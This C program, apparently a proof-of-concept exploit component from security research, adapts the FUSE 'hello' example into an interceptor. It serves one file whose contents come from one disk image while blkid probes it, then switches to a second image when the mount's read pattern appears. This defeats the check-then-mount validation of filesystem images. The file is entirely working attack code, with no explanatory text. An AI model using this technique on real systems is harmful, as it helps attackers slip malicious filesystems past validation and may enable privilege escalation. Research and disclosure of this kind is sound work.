/*
  FUSE: Filesystem in Userspace
  Copyright (C) 2001-2007  Miklos Szeredi <miklos@szeredi.hu>
  heavily modified by Jann Horn <jannh@google.com>

  This program can be distributed under the terms of the GNU GPL.
  See the file COPYING.

  gcc -Wall hello.c `pkg-config fuse --cflags --libs` -o hello
*/

#define FUSE_USE_VERSION 26

#include <fuse.h>
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <fcntl.h>
#include <unistd.h>
#include <err.h>
#include <sys/uio.h>

static const char *file_path = "/wrapped_image";

#define STATE_BLKID 0
#define STATE_MOUNT 1
static int backing_fd_idx = 0;
static int backing_fds[] = {-1, -1};
#define backing_fd (backing_fds[backing_fd_idx])

static void switch_to_fd_idx(int idx) {
	printf("### SWITCHING FROM IDX %d to IDX %d\n", backing_fd_idx, idx);
	backing_fd_idx = idx;
}

static int hello_getattr(const char *path, struct stat *stbuf)
{
	struct stat real_stat;
	if (fstat(backing_fd, &real_stat))
		err(1, "stat backing");
	int res = 0;
	memset(stbuf, 0, sizeof(struct stat));
	if (strcmp(path, "/") == 0) {
		stbuf->st_mode = S_IFDIR | 0755;
		stbuf->st_nlink = 2;
	} else if (strcmp(path, file_path) == 0) {
		stbuf->st_mode = S_IFREG | 0666;
		stbuf->st_nlink = 1;
		stbuf->st_size = real_stat.st_size;
		stbuf->st_blocks = real_stat.st_blocks;
		stbuf->st_blksize = real_stat.st_blksize;
	} else
		res = -ENOENT;
	return res;
}

static int hello_readdir(const char *path, void *buf, fuse_fill_dir_t filler, off_t offset, struct fuse_file_info *fi) {
	filler(buf, ".", NULL, 0);
	filler(buf, "..", NULL, 0);
	filler(buf, file_path + 1, NULL, 0);
	return 0;
}

static int hello_open(const char *path, struct fuse_file_info *fi) {
	return 0;
}

static int hello_read(const char *path, char *buf, size_t size, off_t offset, struct fuse_file_info *fi) {
	printf("read offset=0x%08lx size=0x%08lx\n", (unsigned long)offset, (unsigned long)size);
	if (offset == 0 && size == 0x1000) switch_to_fd_idx(STATE_BLKID);
	if (offset == 0x0011e000 && size == 0x2000) switch_to_fd_idx(STATE_MOUNT);
	if (strcmp(path, file_path)) return -EINVAL;
	size_t done = 0;
	while (size > done) {
		int res = pread(backing_fd, buf+done, size-done, offset+done);
		if (res == -1) err(1, "pread");
		if (res == 0) return done;
		done += res;
	}
	return size;
}

static int hello_write(const char *path, const char *buf, size_t size, off_t offset, struct fuse_file_info *fi) {
	printf("write offset=0x%08lx size=0x%08lx\n", (unsigned long)offset, (unsigned long)size);
	if (strcmp(path, file_path)) return -EINVAL;
	size_t done = 0;
	while (size > done) {
		int res = pwrite(backing_fd, buf+done, size-done, offset+done);
		if (res == -1) err(1, "pwrite");
		if (res == 0) return done;
		done += res;
	}
	return size;
}

static struct fuse_operations hello_oper = {
	.getattr	= hello_getattr,
	.readdir	= hello_readdir,
	.open		= hello_open,
	.read		= hello_read,
	.write		= hello_write,
};

int main(int argc, char *argv[]) {
	backing_fds[STATE_BLKID] = open("disk_image_blkid", O_RDWR);
	backing_fds[STATE_MOUNT] = open("disk_image_mount", O_RDWR);
	if (backing_fd == -1)
		err(1, "can't open disk image");
	char *fake_argv[] = {
		"fuse_intercept",
		"-f", "-s", "-o", "allow_other", "-o", "direct_io", "./mount",
		NULL
	};
	return fuse_main(sizeof(fake_argv)/sizeof(fake_argv[0])-1, fake_argv, &hello_oper, NULL);
}
